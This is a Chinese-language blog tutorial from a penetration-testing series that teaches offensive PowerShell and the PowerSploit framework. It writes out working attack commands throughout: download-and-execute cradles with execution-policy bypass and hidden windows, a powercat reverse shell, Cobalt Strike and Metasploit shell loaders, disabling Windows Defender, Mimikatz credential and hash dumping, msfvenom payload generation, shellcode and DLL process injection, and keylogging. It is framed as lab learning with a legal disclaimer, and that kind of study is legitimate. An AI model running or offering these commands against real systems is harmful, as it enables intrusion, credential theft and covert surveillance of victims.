[网络安全提高篇] 一〇八.Powershell和PowerSploit脚本渗透详解 (1)

当您阅读到该篇文章时，作者已经将“网络安全自学篇”设置成了收费专栏，首先说声抱歉。感谢这一年来大家的阅读和陪伴，这100篇安全文章记录了自己从菜鸡到菜鸟的成长史，该部分知识也花了很多精力去学习和总结。由于在外读书且需要养娃，所以按最低价9.9元设置成了收费专栏，赚点奶粉钱，感谢您的抬爱。当然，如果您还是一名在读学生或经济拮据，可以私聊我或去github下载对应的免费文章，更希望您能进步，一起加油喔！

接下来我会接着之前的内容继续分享，“网络安全提高班”新的100篇文章即将开启，包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结，它将更加聚焦，更加深入，也是作者的慢慢成长史。换专业确实挺难的，Web渗透也是块硬骨头，但我也试试，看看自己未来四年究竟能将它学到什么程度，漫漫长征路，偏向虎山行。享受过程，一起加油~

前文给大家介绍了安全还威胁框架ATT&CK、滑动标尺模型，并通过Cyberbit Range靶场详细介绍蓝队勒索事件取证溯源过程。这篇文章将详细讲解PowerShell和PowerSploit脚本攻击，进一步结合MSF漏洞利用来实现脚本攻击。希望这篇文章对您有帮助，更希望帮助更多安全或红蓝对抗的初学者，也推荐大家去使用Cyberbit Range的靶场，且看且珍惜。本文参考徐焱老师的《Web安全攻防渗透测试实战指南》著作，谢公子博客，并结合作者之前的博客和经验进行总结。

• 安全博客梳理：那些年我在CSDN追过的安全白帽大佬，respect

作者作为网络安全的小白，分享一些自学基础教程给大家，主要是关于安全工具和实践操作的在线笔记，希望您们喜欢。同时，更希望您能与我一起操作和进步，后续将深入学习网络安全和系统安全知识并分享相关实验。总之，希望该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！如果文章对您有帮助，将是我创作的最大动力，点赞、评论、私聊均可，一起加油喔~

• 自学篇工具：https://github.com/eastmountyxz/NetworkSecuritySelf-study
• 系统安全：https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis

声明：本人坚决反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络需要我们共同维护，更推荐大家了解它们背后的原理，更好地进行防护。

提高篇：（自学系列100篇目录放在文章末尾）

• [网络安全提高班] 一〇一.网络空间安全普及和医疗数据安全防护总结
• [网络安全提高篇] 一〇二.Metasploit技术之基础用法万字详解及MS17-010漏洞复现
• [网络安全提高篇] 一〇三.Metasploit后渗透技术之信息收集、权限提权、移植漏洞模块和后门
• [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解（SQL注入、XSS攻击、文件上传漏洞）
• [网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题（联合Cream老师）
• [网络安全提高篇] 一〇六.SQL注入之手工注入和SQLMAP入门案例详解
• [网络安全提高篇] 一〇七.安全威胁框架理解及勒索病毒取证溯源分析（蓝队）
• [网络安全提高篇] 一〇八.Powershell和PowerSploit脚本攻击详解 (1)

---

一.Powershell攻击详解

在渗透测试中，Powershell是不能忽略的一个环节，而且仍在不断地更新和发展，它具有良好的灵活性和功能化管理Windows系统的能力。一旦攻击者可以在一台计算机上运行代码，就会下载PowerShell脚本文件（.ps1）到磁盘中执行，甚至无须写到磁盘中执行，它就可以直接在内存中运行。

这些特点使得PowerShell在获得和保持对系统的访问权限时，成为攻击者首选的攻击手段，利用PowerShell的诸多特点，攻击者可以持续攻击而不被轻易发现。常用的PowerShell攻击工具有以下几种。

• PowerSploit
  这是众多PowerShell攻击工具中被广泛使用的PowerShell后期漏洞利用框架，常用于信息探测、特权提升、凭证窃取、持久化等操作。
• Nishang
  基于PowerShell的渗透测试专用工具，集成了框架、脚本和各种Payload，包含下载和执行、键盘记录、DNS、延时命令等脚本。
• Empire
  基于PowerShell的远程控制木马，可以从凭证数据库中导出和跟踪凭据信息，常用于提供前期漏洞利用的集成模块、信息探测、凭据窃取、持久化控制。
• PowerCat
  PowerShell版的NetCat，有着网络工具中的“瑞士军刀”美誉，它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向，读者可以在脚本中以多种方式使用它。

参考作者前文：

• [网络安全自学篇] 十九.Powershell基础入门及常见用法（一）
• [网络安全自学篇] 二十.Powershell基础入门及常见用法（二）

1.PowerShell简介

Windows PowerShell 是一种命令行外壳程序和脚本环境，它内置在Windows 7版本及其以上的系统中，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念，从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。

各Windows操作系统的PowerShell版本如下：

一旦攻击者在一台计算机上运行代码，他们就会下载PowerShell脚本文件（.ps1）到磁盘中执行，甚至无须写道磁盘中执行，就可以直接在内存中运行（无文件攻击），也可以把PowerShell看作命令行提示符cmd.exe的扩充。

在64位的Windows操作系统中，存在x64和x86两个版本的PowerShell，这两个版本的执行策略不会相互影响，可以看作是两个独立的程序。x64版本的配置文件在如下路径中。PowerShell包含两个应用程序组件：基于文本的标准控制台（powershell.exe）和集成命令环境的图形化界面（ISE：powershell_ise.exe）。

• C:\Windows\SysWOW64\WindowsPowerShell\v1.0

传统的CMD支持脚本编写，但扩展性不好，而Powershell类似于Linux shell，具有更好的远程处理、工作流、可更新的帮助、预定任务（Scheduled Job）、CIM等优点。

(1) 首先，如何进入Powershell呢？
一种方法是在运行中直接输入Powershell打开，另一种方法是CMD中输入Powershell打开。

不同操作系统内置的Powershell是不一样的，比如win7或win2008。

(2) 其次，如何查看版本呢？
第一个命令如下：

Get-Host

输出结果如下图所示：

另一个命令是：

$psversiontable

同时，Powershell可以获取计算机的服务详细信息、状态等。

get-service

其显示结果如下图所示，采用动词+名词方式命名，比较清楚。

(3) 简单总结PowerShell优点
PowerShell需要.NET环境的支持，同时支持.NET对象，其可读性、易用性，可以位居当前所有Shell之首。PowerShell的这些特点正在吸引攻击者，使它逐渐成为一个非常流行且得力的攻击工具。由于Powershell具有以下特点，它被广泛应用于安全领域，甚至成为每一位Web安全必须掌握的技术。常见的优点包括：

• Windows 7以上的操作系统默认安装
• PowerShell脚本可以运行在内存中，不需要写入磁盘
• 可以从另一个系统中下载PowerShell脚本并执行
• 目前很多工具都是基于PowerShell开发的
• 很多安全软件并不能检测到PowerShell的互动
• cmd.exe通常会被阻止运行，但PowerShell不会
• 可以用来管理活动目录
• 支持面向对象，支持和.net平台交互
• 强大的兼容性，和cmd、vbs相互调用
• 可扩展性好，它可以用来管理活动目录、虚拟机产品等平台

---

2.PowerShell基本概念

(1) PS1文件
一个PowerShell脚本其实是一个简单的文本文件，这个文件包含了一系列PowerShell命令，每个命令显示为独立的一行，对于被视为PowerShell脚本的文本文件，它的文件名需要加上.PS1的扩展名。

(2) 执行策略
为防止恶意脚本的执行，PowerShell有一个执行策略，在默认情况下，这个执行策略被设为首先。在PowerShell脚本无法执行时，可以使用下面的 Get-ExecutionPolicy 命令确定当前的执行策略。它包括4个策略：

• Restricted：脚本不能运行（默认设置）
• RemoteSigned：本地创建的脚本可以运行，但从网上下载的脚本不能运行（拥有数字证书签名除外）
• AllSigned：仅当脚本由受信任的发布者签名时才能运行
• Unrestricted：允许所有的Script运行

我们还可以使用下面的cmdlet命令设置PowerShell的执行策略。

• Set-ExecutionPolicy [policy name] 策略名

(3) 运行脚本
运行一个PowerShell脚本，必须键入完整的路径和文件名。例如，你要运行一个名为a.ps1的脚本，可以键入 C:\Scripts\a.ps1。最大的例外是，如果PowerShell脚本文件刚好位于你的系统目录中，那么在命令提示符后直接键入脚本文件名即可运行，如 .\a.ps1 的前面加上“.\”，这和在Linux下还行Shell脚本的方法一样。

(4) 管道
PowerShell的管道作用是将一个命令的输出作为另一个命令的输入，两个命令之间用管道符号（|）连接。举个例子来看管道是如何工作的，假设停止所有目前运行汇总以 “p” 字符开头命名的程序，命令如下：

• get-process p* | stop-process

管道并不是什么新事物，以前的Cmd控制台也有重定向的命令，例如Dir | More可以将结果分屏显示。传统的Cmd管道是基于文本的，但是Powershell管道是基于对象。例如：

linux：ls
cmd：dir

如果只获取其中的name、mode值，则使用如下指令。

ls | format-table name, mode

---

3.PowerShell常用命令及绕过权限执行

在PowerShell下，类似“cmd命令”叫作“cmdlet”，其命名规范相当一致，都采用“动词-名词”的形式，如New-Item，动词部分一般为Add、New、Get、Remove、Set等，命名的别名一般兼容Windows Command和Linux Shell，如Get-ChildItem命令使用dir或ls均可，而且PowerShell命令不区分大小写。

下面以文件操作为例讲解PowerShell命令的基本用法。

• 新建目录：New-Item whitecellclub-ItemType Directory
• 新建文件：New-Item light.txt-ItemType File
• 删除目录：Remove-Item whitecellclub
• 显示文件内容：Get-Content test.txt
• 设置文件内容：Set-Content test.txt-Value “hello,world!”
• 追加内容：Add-Content light.txt-Value “i love you”
• 清除内容：Clear-Content test.txt

举个简单的示例：

New-Item test -ItemType directory
Remove-Item test
New-Item eastmount.txt -ItemType file -value "hello csdn"  

Get-Content eastmount.txt
Add-Content eastmount.txt -Value " bye!"
Get-Content eastmount.txt 

Set-Content eastmount.txt -Value "haha"
Get-Content eastmount.txt
Clear-Content eastmount.txt
Get-Content eastmount.txt
Remove-Item eastmount.txt
Get-Content eastmount.txt

同样，我们还以通过Windows终端提示符输入“PowerShell”，进入PowerShell命令行，输入help命令显示帮助菜单。

经过测试，在cmd窗口执行过程下载的PowerShell脚本，不论当前策略，都可以直接运行。而如果要在PowerShell窗口运行脚本程序，必须要管理员权限将Restricted策略改成Unrestricted，所以在渗透时，就需要采用一些方法绕过策略来执行脚本。

(1) 下载远程PowerShell脚本绕过权限执行
调用DownloadString函数下载远程的ps1脚本文件。

//cmd窗口执行以下命令
powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

//在powershell窗口执行
IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

下图引用谢公子的图片，切换到CMD窗口运行。

(2) 绕过本地权限执行
上传xxx.ps1至目标服务器，在CMD环境下，在目标服务器本地执行该脚本，如下所示。

PowerShell.exe -ExcutionPolicy Bypass -File xxx.ps1

powershell -exec bypass  .\test.ps1

(3) 本地隐藏绕过权限执行脚本

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo
-NonInteractive -NoProfile -File xxx.ps1

举个示例：

• powershell.exe -exec bypass -W hidden -nop test.ps1

(4) 用IEX下载远程PS1脚本绕过权限执行

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden-NoProfile
-NonIIEX(New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]

下面对上述命令的参数进行说明，如下所示。

• ExecutionPolicy Bypass：绕过执行安全策略，这个参数非常重要，在默认情况下，PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数，可以绕过任意一个安全保护规则。在渗透测试中，基本每一次运行PowerShell脚本时都要使用这个参数。
• WindowStyle Hidden：隐藏窗口
• NoLogo：启动不显示版权标志的PowerShell
• NonInteractive（-NonI）：非交互模式，PowerShell不为用户提供交互的提示
• NoProfile（-NoP）：PowerShell控制台不加载当前用户的配置文件
• Noexit：执行后不退出Shell，这在使用键盘记录等脚本时非常重要

再次强调，PowerShell脚本在默认情况下无法直接执行，这是就可以使用上述方法绕过安全策略，运行PowerShell脚本如下图所示。

PowerShell.exe -ExecutionPolicy Bypass -File .\test.ps1 

通过增加 -ExecutionPolicy Bypass 实现绕过安全策略，并运行输出结果。

本地我们可以看到 test.ps1 文件。

---

4.PowerShell远程下载文件并执行

该部分内容学习了谢公子老师的总结，当然第二部分我详细介绍了和渗透结合的用法。

CMD窗口下载文件
管理员权限才可以下载到C盘目录下，普通权限不能下载到C盘。

//下载文件到指定目录
powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','d:/test.exe');
 
//下载文件到当前目录
powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');

CMD窗口下载文件并执行exe

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');start-process test.exe

CMD窗口下载文件并执行ps1脚本

powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

远程下载powercat.ps1脚本，并带参数运行，该命令可以绕过PowerShell执行策略

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd

---

5.PowerShell渗透测试常用命令

关闭Windows自带的Defender防火墙（需要管理员权限）。

powershell Set-MpPreference -disablerealtimeMonitoring $true

在CMD窗口下执行，将远程主机上的test.exe下载到本地。

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','d:/test.exe');

在CMD窗口下利用PowerShell反弹NC shell。

//在cmd窗口执行
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd

//在powershell窗口执行
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd

在CMD窗口下利用PowerShell反弹CobaltStrike Shell。

//在cmd窗口执行
powershell.exe -c IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx/a'))  

//在powershell窗口执行
IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx/a'))

在CMD窗口下利用PowerShell反弹MSF Shell。

//在cmd窗口执行
powershell -c IEX (New-Object Net.WebClient).DownloadString('http://xx.xx.xx.xx/7788.ps1');xx.ps1

//在powershell窗口执行
IEX (New-Object Net.WebClient).DownloadString('http://xx.xx.xx.xx/7788.ps1');xx.ps1

远程加载PowerShell脚本读取明文密码（需要管理员权限）。

//在cmd窗口执行
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts

//在powershell窗口执行
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts

远程加载PowerShell脚本读取明文密码hash值（需要管理员权限）。

//在cmd窗口执行
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

//在powershell窗口执行
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

---

6.PowerShell导入文件

在大型PowerShell项目中，通常包括.ps1、.psd1和.psm1后缀文件。比如Powersploit。

• .ps1文件：是PowerShell脚本文本
• .psd1文件：模块介绍文件
• .psm1文件：模块文件

其中，psm1和psd1文件可以使用以下命令导入。

 Import-Module .\PowerSploit.psm1
 Import-Module .\PowerSploit.psd1

导入模块输入命令：

• Get-Command -Module PowerSploit

对于.ps1文件，既可以使用Import-Module导入，也可以使用 . 导入。

Import-Module .\Get-Information.ps1
. .\Get-Information.ps1

---

二.PowerSploit攻击详解

PowerSploit是一款基于PowerShell的后渗透（Post-Exploition）框架软件，包含很多PowerShell攻击脚本，它们主要用于渗透中的信息侦查、权限提升、权限维持。PowerSploit各个模块的功能包括：

• AntivirusBypass：发现杀毒软件的查杀特征
• CodeExecution：在目标主机上执行代码
• Exfiltration：目标主机上的信息搜集工具
• Mayhem：蓝屏等破坏性脚本
• Persistence：后门脚本（持久性控制）
• Recon：以目标主机为跳板进行内网信息侦查
• ScriptModification：在目标主机上创建或修改脚本

其GitHub地址为：

• https://github.com/PowerShellMafia/PowerSploit

1.PowerSploit安装

第一步，下载PowerSploit资源。
我们在Kali中可以使用git命令下载该程序。

• git clone https://github.com/PowerShellMafia/PowerSploit

如果下载报错“git fatal: unable to access server certificate verification failed. CAfile: none CRLfile: none”，读者可以直接从github下载移动至Kali指定目录。

第二步，解压文件。

• unzip PowerSploit-master.zip

解压后的文件如下图所示：

第三步，将解压后的文件夹移动到/var/www/html目录，然后搭建一个简易的服务器。

• mv PowerSploit-master /var/www/html

第四步，开启Apache服务器。

• service apache2 start

在本地浏览器中用IP地址访问，证明我们的Apache服务器设置成果。

---

2.MSF反弹Shell

接下来，我们在Kali中使用 reverse_https模块进行反弹shell。

第一步，打开msfconsole。

• msfconsole

第二步，在msf设置 windows/x64/meterpreter/reverse_https 模块进行反弹并开启监听。

• use exploit/multi/handler
  使用监听模块
• set payload windows/x64/meterpreter/reverse_tcp
  设置payload
• set LHOST 192.168.44.138
  设置本机IP地址
• set RPORT 4444
  设置本地端口4444

• show options
  查看监听的配置信息

接着运行处于监听状态。

• run
• exploit

---

3.Invoke-Shellcode执行代码

CodeExecution模块下的Invoke-Shellcode脚本常用于将Shellcode插入指定的进程ID或本地PowerShell中，下面介绍两种常用的反弹Meterpreter Shell方法。

第一种方法：直接执行shellcode反弹Meterpreter Shell

第一步，使用之前的步骤利用MSF进行监听。

msf5 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://192.168.59.128:4444

第二步，使用msfvenom命令生成一个powershell脚本木马。

• msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.44.138
  LPORT=4444 -f powershell -o /var/www/test

生成的脚本位于 /var/www/html 目录下，代码如下图所示：

第三步，接着在目标机Powershell下输入以下命令下载该脚本。

• IEX (New-Object Net.WebClient).DownloadString(“http://192.168.44.138/PowerSploit-master/CodeExecution/Invoke-Shellcode.ps1”)

常见错误解决方法
第一种错误是提示“被防病毒软件阻止”。


此时我们需要设置防火墙拦截问题，允许该powershell运行即可。


如果还是被拦截，可能是需要管理员权限运行PowerSploit，设置方法如下：

第四步，输入以下命令下载木马。

• IEX (New-Object Net.WebClient).DownloadString(“http://192.168.44.138/test”)

第五步，运行下面的命令。其中的-Force意思是不用提示，直接执行。

• Invoke-Shellcode -Shellcode ($buf) -Force

按理说，此步骤执行完成后，返回MSF的监听界面下，会发现已经反弹成功了，可是我的Powershell在运行完命令后会报错或崩溃，个人感觉环境问题。

正确运行结果如下图所示：

---

第二种方法：指定进程注入shellcode反弹Meterpreter Shell

第一步，同样先在目标机Powershell下输入命令下载脚本和木马。

IEX (New-Object Net.WebClient).DownloadString("http://192.168.44.138/PowerSploit-master/CodeExecution/Invoke-Shellcode.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://192.168.44.138/test")

第二步，输入Get-Process命令或者ps命令查看当前进程。

• Get-Process

第三步，输入命令创建一个新进程，并把它设置为隐藏的。

• Start-Process C:\windows\system32\notepad.exe -WindowStyle Hidden
• Get-Process

第四步，输入Get-Process命令查看进程，可以看到多了一个id为2580，名为notepad的进程。

第五步，使用Invoke-Shellcode脚本进行进程注入。

• Invoke-Shellcode -ProcessID 2580 -Shellcode ($buf) -Force

---

4.Invoke-Portscan扫描端口

nvoke-Portscan是Recon模块下的一个脚本，主要用于端口扫描，使用起来也比较简单。使用方法如下。

第一步，先下载脚本，然后进行扫描。

• IEX (New-Object Net.WebClient).DownloadString(“http://192.168.44.138/PowerSploit-master/Recon/Invoke-Portscan.ps1”)

第二步，使用下面命令扫描端口。

• Invoke-Portscan -Hosts 192.168.44.1,192.168.44.138 -Ports “80,22,445,3389”

发现1开放445和3389端口，138开放80端口。

---

5.Invoke-Mimikatz

Invoke-Mimikatz是Exfiltration模块下的一个脚本。

第一步，下载脚本。

• IEX (New-Object Net.WebClient).DownloadString(“http://192.168.44.138/PowerSploit-master/Exfiltration/Invoke-Mimikatz.ps1”)

第二步，执行命令使用Mimikatz攻击，密码抓取工具。

• Invoke-Mimikatz -DumpCreds

PS C:\> Invoke-Mimikatz -DumpCreds

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)  #报错啦

mimikatz(powershell) # exit
Bye!

PS C:\>

---

6.Invoke-DllInjection

下面使用CodeExecution模块下的另一个脚本Invoke-DllInjection，它是一个DLL注入的脚本。

第一步，在MSF里配置好监听，使用以下命令在kali中生成一个dll的反弹木马。

• msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.44.138
  LPORT=4444 -f dll -o /var/www/html/test.dll

生成的test.dll注入文件如下图所示：

第二步，在目标机上下载脚本，输入以下命令。

• IEX (New-Object Net.WebClient).DownloadString(“http://192.168.44.138/PowerSploit-master/CodeExecution/Invoke-DllInjection.ps1”)

第三步，启动一个新进程，使用Invoke-Shellcode脚本进行进程注入。

• Start-Process C:\windows\system32\notepad.exe -WindowStyle Hidden

• Get-Process
• get-process notepad

第四步，使用下面命令注入。

• Invoke-DllInjection -ProcessID 2580 -Dll c:\test.dll

但是MSF反弹还是失败。

---

7.Get-Keystrokes

Get-Keystrokes是Exfiltration模块下的一个脚本，用于键盘记录，功能相当强大，不仅有键盘输入记录，甚至能记录鼠标的点击情况，还能记录详细的时间，实战时可以直接放入后台运行。使用方法如下。

第一步，下载脚本。

• IEX (New-Object Net.WebClient).DownloadString(“http://192.168.44.138/PowerSploit-master/Exfiltration/Get-Keystrokes.ps1”)

第二步，命令开启键盘记录。

• Get-Keystrokes -Logpath c:\test1.txt

第三步，存储相关信息。

---

8.脚本分类及功能

AntivirusBypass(绕过杀毒)

• Find-AVSignature
  发现杀软的签名

CodeExecution(代码执行)

• Invoke-DllInjection.ps1
  DLL注入脚本 注意dll架构要与目标进程相符，同时要具备相应的权限
• Invoke-ReflectivePEInjection.ps1
  反射型注入 将Windows PE文件（DLL / EXE）反射加载到powershell进程中，或反射地将DLL注入远程进程
• Invoke-Shellcode.ps1
  将shellcode插入您选择的进程ID或本地PowerShell中
• Invoke-WmiCommand.ps1
  在目标主机使用wmi执行命令

Exfiltration(信息收集)：主要是收集目标主机上的信息

• Out-Minidump.ps1
  生成一个进程的全内存小数据库
• Get-VaultCredential.ps1
  显示Windows徽标凭据对象，包括明文Web凭据
• Get-Keystrokes.ps1
  记录按键，时间和活动窗口
• Get-GPPPassword.ps1
  检索通过组策略首选项推送的帐户的明文密码和其他信息
• Get-GPPAutologon.ps1
  如果通过组策略首选项推送，则从registry.xml检索自动登录用户名和密码
• Get-TimedScreenshot.ps1
  这是一个以定期间隔拍摄屏幕并将其保存到文件夹的功能
• Invoke-Mimikatz.ps1
  查看主机密码
• Invoke-NinjaCopy.ps1
  通过读取原始卷并解析NTFS结构，从NTFS分区卷复制文件
• Invoke-CredentialInjection.ps1
  使用明文凭据创建登录，而不会触发可疑事件ID 4648（显式凭证登录）
• Invoke-TokenManipulation.ps1
  列出可用的登录令牌。与其他用户创建进程登录令牌，并模仿当前线程中的登录令牌
• Get-MicrophoneAudio.ps1
  通过麦克风记录声音
• VolumeShadowCopyTools.ps1

Recon(信息侦察)：这个文件夹主要是以目标主机为跳板进行内网主机侦察

• Invoke-Portscan.ps1
  端口扫描
• Get-HttpStatus.ps1
  返回指定路径的HTTP状态代码和完整URL，并附带字典文件
• Invoke-ReverseDnsLookup.ps1
  扫描DNS PTR记录的IP地址范围
• PowerView.ps1
  PowerView是一系列执行网络和Windows域枚举和利用的功能
• Get-ComputerDetails
  获得登录信息

ScriptModification(脚本修改)

• Out-EncodedCommand.ps1
  将脚本或代码块编码，并为PowerShell有效载荷脚本生成命令行输出
• Out-EncryptedScript.ps1
  加密文本文件/脚本
• Out-CompressedDll.ps1
  压缩，Base-64编码，并输出生成的代码，以将受管理的DLL加载到内存中
• Remove-Comments.ps1
  从脚本中删除注释和多余的空白

Persistence(权限维持)

• New-UserPersistenceOption
  为添加持久性函数配置用户级持久性选项。
• New-ElevatedPersistenceOption
  为添加持久性函数配置提升的持久性选项。
• Add-Persistence
  向脚本添加持久性功能
• Install-SSP
  安装安全支持提供程序（ssp）dll
• Get-SecurityPackages

Privesc(提权)

• PowerUP
  共同特权升级检查的信息交换所，以及一些武器化载体
• Get-System

Mayhem

• Set-MasterBootRecord
  选择的消息覆写主引导记录
• Set-CriticalProcess
  退出powershell时使系统蓝屏

---

三.总结

写到这里，这篇文章就介绍结束了，希望对您有所帮助，继续加油~

• 一.Powershell攻击详解
  1.PowerShell简介
  2.PowerShell基本概念
  3.PowerShell常用命令及绕过权限执行
  4.PowerShell远程下载文件并执行
  5.PowerShell渗透测试常用命令
  6.PowerShell导入文件
• 二.PowerSploit攻击详解
  1.PowerSploit安装
  2.MSF反弹Shell
  3.Invoke-Shellcode执行代码
  4.Invoke-Portscan扫描端口
  5.Invoke-Mimikatz
  6.Invoke-DllInjection
  7.Get-Keystrokes
  8.脚本分类及功能
• 三.总结

这篇文章中如果存在一些不足，还请海涵。作者作为网络安全初学者的慢慢成长路吧！希望未来能更透彻撰写相关文章。同时非常感谢参考文献中的安全大佬们的文章分享，深知自己很菜，得努力前行。

欢迎大家讨论，是否觉得这系列文章帮助到您！任何建议都可以评论告知读者，共勉。

• 逆向分析：https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis
• 网络安全：https://github.com/eastmountyxz/NetworkSecuritySelf-study

2020年8月18新开的“娜璋AI安全之家”，主要围绕Python大数据分析、网络空间安全、人工智能、Web渗透及攻防技术进行讲解，同时分享CCF、SCI、南核北核论文的算法实现。娜璋之家会更加系统，并重构作者的所有文章，从零讲解Python和安全，写了近十年文章，真心想把自己所学所感所做分享出来，还请各位多多指教，真诚邀请您的关注！谢谢。

(By:Eastmount 2021-04-09 夜于武汉 http://blog.csdn.net/eastmount/ )

---

参考文章如下，感谢这些大佬。

• 徐焱老师的《Web安全攻防渗透测试实战指南》著作
• [网络安全自学篇] 十九.Powershell基础入门及常见用法（一）
• [网络安全自学篇] 二十.Powershell基础入门及常见用法（二）
• PowerShell使用浅析 - 谢公子
• https://www.cnblogs.com/yuzly/p/10505365.html

---

自学篇（建议直接跳转到正文）：

• [网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
• [网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记
• [网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例
• [网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
• [网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
• [网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向
• [网络安全自学篇] 七.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨
• [网络安全自学篇] 八.Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
• [网络安全自学篇] 九.社会工程学之基础概念、IP获取、IP物理定位、文件属性
• [网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
• [网络安全自学篇] 十一.虚拟机VMware+Kali安装入门及Sqlmap基本用法
• [网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码（一）
• [网络安全自学篇] 十三.Wireshark抓包原理（ARP劫持、MAC泛洪）及数据流追踪和图像抓取（二）
• [网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信（一）
• [网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程（二）
• [网络安全自学篇] 十六.Python攻防之弱口令、自定义字典生成及网站暴库防护
• [网络安全自学篇] 十七.Python攻防之构建Web目录扫描器及ip代理池（四）
• [网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示（一）
• [网络安全自学篇] 十九.Powershell基础入门及常见用法（一）
• [网络安全自学篇] 二十.Powershell基础入门及常见用法（二）
• [网络安全自学篇] 二十一.GeekPwn极客大赛之安全攻防技术总结及ShowTime
• [网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
• [网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
• [网络安全自学篇] 二十四.基于机器学习的恶意代码识别及人工智能中的恶意代码检测
• [网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
• [网络安全自学篇] 二十六.Shodan搜索引擎详解及Python命令行调用
• [网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置（一）
• [网络安全自学篇] 二十八.文件上传漏洞和Caidao入门及防御原理（一）
• [网络安全自学篇] 二十九.文件上传漏洞和IIS6.0解析漏洞及防御原理（二）
• [网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御（三）
• [网络安全自学篇] 三十一.文件上传漏洞之Upload-labs靶场及CTF题目01-10（四）
• [网络安全自学篇] 三十二.文件上传漏洞之Upload-labs靶场及CTF题目11-20（五）
• [网络安全自学篇] 三十三.文件上传漏洞之绕狗一句话原理和绕过安全狗（六）
• [网络安全自学篇] 三十四.Windows系统漏洞之5次Shift漏洞启动计算机
• [网络安全自学篇] 三十五.恶意代码攻击溯源及恶意样本分析
• [网络安全自学篇] 三十六.WinRAR漏洞复现（CVE-2018-20250）及恶意软件自启动劫持
• [网络安全自学篇] 三十七.Web渗透提高班之hack the box在线靶场注册及入门知识（一）
• [网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求（二）
• [网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法（三）
• [网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含漏洞复现及详解（CVE-2018-12613）
• [网络安全自学篇] 四十一.中间人攻击和ARP欺骗原理详解及漏洞还原
• [网络安全自学篇] 四十二.DNS欺骗和钓鱼网站原理详解及漏洞还原
